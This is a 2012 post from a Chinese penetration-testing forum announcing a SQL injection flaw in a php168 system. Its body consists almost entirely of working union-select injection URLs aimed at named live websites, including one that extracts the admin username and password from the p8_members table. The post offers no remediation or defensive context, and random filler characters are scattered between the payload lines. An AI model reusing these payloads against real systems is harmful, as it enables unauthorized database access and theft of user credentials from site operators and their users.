找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php168某系统注入漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3040|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--# v! r1 A, m! J- h7 N! R
                                                         1 R- D3 R( v5 t, ?. @
                                       
7 [0 A  z+ C/ O( e" V
7 W- F" A7 [5 \2 l& Q3 chttp://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
' ~- T1 e, G6 f* ^7 K' G                                                     3 A+ G* Q3 q0 K: k4 a7 k- l" t
                                                                   8 G/ j/ ~. G5 t; d
                                                        , f: |9 B$ H" t+ c
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
. N1 F7 [: I# `2 N
1 j6 ?  X+ X+ z' z7 s
8 @0 |) T# j) F; |
3 I6 M. T4 S) Z8 i1 ?) {) c7 n                                                            
# u( c5 |) r0 D( p8 w8 }9 G' I
5 i  h5 c8 w% S* k" ^http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--+ l! X& H, V3 d  }$ c
/ A! Q( [2 N8 r2 x0 r

. R7 q+ j& d4 q# M+ a0 l& v: u( c8 ?9 {2 m( o
                                                                    
  }  l8 \2 x* I1 }5 F' v/ o* e
系统, database, version

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表